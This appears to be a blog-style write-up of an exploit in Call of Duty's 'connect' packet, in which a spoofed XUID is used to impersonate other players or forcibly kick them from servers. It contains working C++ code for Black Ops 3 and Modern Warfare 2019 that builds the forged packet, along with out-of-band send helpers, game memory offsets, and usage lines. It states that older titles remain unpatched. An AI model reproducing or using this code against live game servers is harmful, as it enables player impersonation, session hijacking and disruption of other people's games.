Table of Contents

What is The 'Connect' Packet

The 'connect' packet is a crucial part of the connection process in every Call of Duty title, used to establish communication with the dedicated servers and third-party authentication providers like Demonware. This packet contains a variety of critical player data ranging from player identifiers to game specific attributes that enables seamless server access. For over 15 years, the 'connect' packet has remained a core component of the game's connection protocol. Despite its significance, this packet has also remained largely unnoticed, even though it plays a vital role in the secure and accurate authentication of players as they connect to both the game's servers and external services.

How the 'Connect' Packet Works

This data may vary depending on the Call of Duty title. Within the game's networking, the 'connect' packet is generated during the client's initial connection attempt. The data inside the 'connect' packet includes player specific information such as the unique player ID, user session ID, platform data, and additional parameters, such as the player's clan ID and rank.

The process begins when a player initiates a connection, and the 'connect' packet is sent to the server.

Key steps of how the packet functions:

In summary, the 'connect' packet is integral to the process of establishing a valid, secure connection between the player and the Call of Duty servers. Its role in transmitting player data and handling the authentication process makes it a cornerstone of the game's network architecture. Despite being an essential part of the connection flow for over 15 years, this packet has remained a largely unnoticed and under-explored component, with its full potential being uncovered only recently.

The Exploit

The primary exploit in the 'connect' packet occurs when a malicious user manipulates the xuid value within the packet. The xuid serves as a unique player identifier. By mismatching their own xuid with that of another player, the attacker can deceive the server into thinking they are that player, potentially gaining unauthorized access to the game session. This mismatch allows the attacker to bypass player specific authentication checks, enabling various forms of exploitation such as impersonating other players, hijacking game sessions, or injecting invalid data into the server.

In addition to the xuid, the 'connect' packet also contains other critical data fields that must align with the game's expectations for the connection to be valid. These include details such as the protocol ID, challenge response, and netfieldchk. These values can vary between different Call of Duty titles, and even slight mismatches can cause the server to reject the connection or disconnect the attacker. Therefore, precision is critical when crafting the 'connect' packet, the attacker must ensure that all fields match the server's requirements exactly. This level of manipulation can also be used to forcefully disconnect any client by sending a crafted 'connect' packet with invalid or mismatched data, resulting in the server forcibly disconnecting the target client.

Code Breakdown:

The following code example demonstrates how to craft a 'connect' packet with a manipulated xuid to exploit the server. This specific code is for Call of Duty: Black Ops 3, though newer titles (e.g., MW2019) may have additional parameters that need to be set within the connect packet for the exploit to work correctly. These newer titles typically have more stringent data requirements, such as the inclusion of additional fields like challenge, protocol, checksum, and statver.

(Steam) Black Ops 3 Connect Packet:

                    
  void send_connect_disconnect(const game::netadr_t& netadr, const uint64_t xuid, const std::string& name, const
  std::string& clantag)
  {
    utils::string::info_string info{};
    info.set("migrating", "0");
    info.set("invited", "1");
    info.set("protocol", std::to_string(events::lobby_msg::PROTOCOL)); // Protocol ID
    info.set("netfieldchk", "1555298985"); // A field used for validation
    info.set("sessionmode", "mp");
    info.set("xuid", utils::string::va("%llx", xuid)); // Manipulated xuid
    info.set("name", name);
    info.set("clanAbbrev", clantag);

    game::net::send_oob(netadr, "connect \"" + info.build() + "\""); // Send the crafted packet
  }

Usage:

                    
  send_connect_disconnect(game::clc()->serverAddress, player_xuid, "custom name", "custom clantag");

(Steam) Modern Warfare 2019 Connect Packet:


  void send_connect_disconnect(game::net_connection_s& connection, const int64_t protocol, const int challenge, const uint64_t our_xuid, const uint64_t xuid)
  {
    utils::string::info_string info{};
    info.set("1335014066", "0");
    info.set("1392059387", "1");
    info.set("-1969936818", "0");
    info.set("-564002754", "0");
    info.set("name", name);
    info.set("nameSuffix", "0");
    info.set("playerTagType", "0");
    info.set("clanId", "0");
    info.set("clanActive", "0");
    info.set("guest", "0");
    info.set("natType", "1");
    info.set("rank", "0");
    info.set("prestige", "0");
    info.set("platUID", "4962712726037362543");
    info.set("mm_party_id", "0");
    info.set("mlg_spectator", "0");
    info.set("mlg_follower", "0");
    info.set("mlg_follower_index", "63");
    info.set("pph", "1");
    info.set("pps", "1");
    info.set("lSquad", "-1");
    info.set("userSessionId", "f9419cf2e76295fb");
    info.set("platform", "1");
    info.set("subplatform", "0");
    info.set("gore", "1");
    info.set("anonymization", "0");
    info.set("protocol", std::to_string(protocol)); // Protocol
    info.set("checksum", "-785076486");
    info.set("platsig", "1602130421");
    info.set("challenge", std::to_string(challenge)); // Challenge
    info.set("statver", "968");
    info.set("xuid", utils::string::va("%llx", xuid)); // Victim's XUID
    info.set("invited", "0");
    info.set("onlineStats", "0");
    info.set("migrating", "0");
    
    auto connect = utils::string::va("connect %llu \"%s\"", our_xuid, info.build().data());
    
    game::net_connection_send_unreliable(&connection, connect.data(), connect.size());
  }

Usage:

                                
  send_connect_disconnect(server_connection, protocol, challenge_for_client, local_xuid, target_xuid);

Explanation of the Code:

  • Manipulating the xuid: The key part of this exploit is the manipulation of the xuid. By setting the xuid to another player's xuid, the attacker can trick the server into thinking they are that player, bypassing the authentication process and gaining access to a session they shouldn't be in.
  • Other Critical Fields: The packet also includes other values such as protocol, netfieldchk, challenge, and checksum. These fields must be correctly set to match the server's expectations, or the connection may be rejected or result in a disconnect. However, it is important to note that these fields may differ depending on the developer of the Call of Duty title in question. For example, the structure and required parameters of these fields can vary between Treyarch developed titles & Infinity Ward developed titles, meaning the exploit must be adapted accordingly to account for these variations.
  • Sending the 'connect' Packet: The crafted packet is then sent to the server using game::net::send_oob, facilitated by a custom function designed to handle Out-of-Band messages. This method is ideal for sending such messages, allowing the attacker to bypass certain server-side validation checks and ensuring the exploit functions as intended. The packet itself is constructed using a custom string class, which allows for precise formatting and manipulation of the packet's data before transmission.

    • Potential Impact of the Exploit:

    • Bypassing Authentication: The attacker can impersonate other players by mismatching the xuid field, bypassing the authentication process and gaining access to a session they shouldn't be in.
    • Impersonating Players: By using another player's xuid, the attacker can trick the server into treating them as that player, allowing them to potentially control or manipulate the game session as if they were the legitimate user.
    • Session Hijacking: With the ability to manipulate the xuid, the attacker may hijack an ongoing session, potentially disrupting the experience for other players or gaining an unfair advantage.
    • Forcefully Disconnecting Clients: By sending a crafted 'connect' packet with certain mismatched or invalid data, the attacker can forcefully disconnect any client, disrupting the game session and causing unintended consequences for other players.

    Method for Sending the 'connect' Packet:

    The send_connect_disconnect function creates the 'connect' packet and sends it to the server using game::net::send_oob. This method is ideal for sending Out-of-Band messages, which helps the attacker circumvent some server-side validation checks. 

    
  bool send_data(const game::netadr_t& target, const std::string& data)
  {
    return NET_SendPacket(NS_SERVER, data.size(), data.data(), target);
  }

  bool send(const game::netadr_t& target, const std::string& data)
  {
    const auto packet{ "\xFF\xFF\xFF\xFF" + data };
    return send_data(target, packet);
  }

    Although NET_SendPacket is better to be used on older Call Of Duty titles, for newer ones, it is recommended to use NET_Connection_Send_Unreliable: While NET_SendPacket remains the optimal choice for older Call of Duty titles due to its compatibility with legacy networking protocols, NET_Connection_Send_Unreliable is the preferred method for newer entries in the series. This newer function is a re-engineered version of NET_SendPacket, designed to offer improved performance and better integration with modern networking frameworks. As newer Call of Duty games have evolved to support more complex server-client interactions, NET_Connection_Send_Unreliable provides a more efficient and reliable solution for handling out-of-band data, ensuring smoother communication and reducing the likelihood of network-related issues.

    Current Offsets For Modern Warfare 2019 (Steam) 
                                    
  const static auto net_connection_send_unreliable = reinterpret_cast<bool(__fastcall*)>(net_connection_s* to, char* buf, size_t length)(OFFSET(0x301D1E0));
  const static auto live_get_xuid = reinterpret_cast<uint64_t(__fastcall*)>(uint64_t* xuid, int local_client_num)(OFFSET(0x3BBA560));

    Proof-of-Concept: The 'Connect' Packet Exploit

    In a recent demonstration of the 'connect' packet exploit, this method was successfully utilized in Call of Duty Black Ops 6, the latest title in the franchise. By manipulating key values within the 'connect' packet, such as the XUID and other critical fields, attackers were able to forcefully kick players from the server, demonstrating the exploit's potential impact on live gameplay sessions.

    For further proof of the exploit's functionality, here are two Twitter posts that provide context and details: First Tweet and Second Tweet.

    Additionally, a video showcasing this exploit working in Call of Duty Black Ops 3 (released in 2015) is available for review. The use of the same exploit across multiple Call of Duty titles, including older ones, highlights the persistent and critical nature of this vulnerability. The video serves as concrete proof of how this exploit can be leveraged even in older iterations of the game, showcasing its effectiveness across years of game development.

    Summary

    The exploit within the 'connect' packet, first uncovered in Call of Duty games, allows attackers to manipulate key values such as the XUID to bypass player authentication, impersonate others, and even forcefully disconnect players. This vulnerability, which has existed in the network protocols of Call of Duty for years, was recently demonstrated in the latest release, Call of Duty Black Ops 6. The exploit was used to kick players from servers in real-time gameplay, showcasing its potential impact on both multiplayer integrity and server stability.

    The exploit was patched in Black Ops 6 on February 6, 2025, after being flagged as a significant security risk. However, despite this patch, the same exploit remains unaddressed in previous Call of Duty titles, including older entries like Black Ops 3. This suggests that while the vulnerability has been mitigated in the latest iteration, earlier titles are still susceptible to the same type of attack.

    For a deeper understanding of the exploit, the following tweets offer context on the real-time demonstrations that led to its discovery: First Tweet and Second Tweet. A video showcasing the exploit's functionality in Call of Duty Black Ops 3, released in 2015, serves as further proof of the persistence of this vulnerability over the years: Watch the Proof-of-Concept Video.

    This proof-of-concept demonstrates the lasting security risks within the Call of Duty series, highlighting the need for continued attention to the game's underlying network infrastructure to safeguard against future exploits and enhance player safety across all titles in the franchise.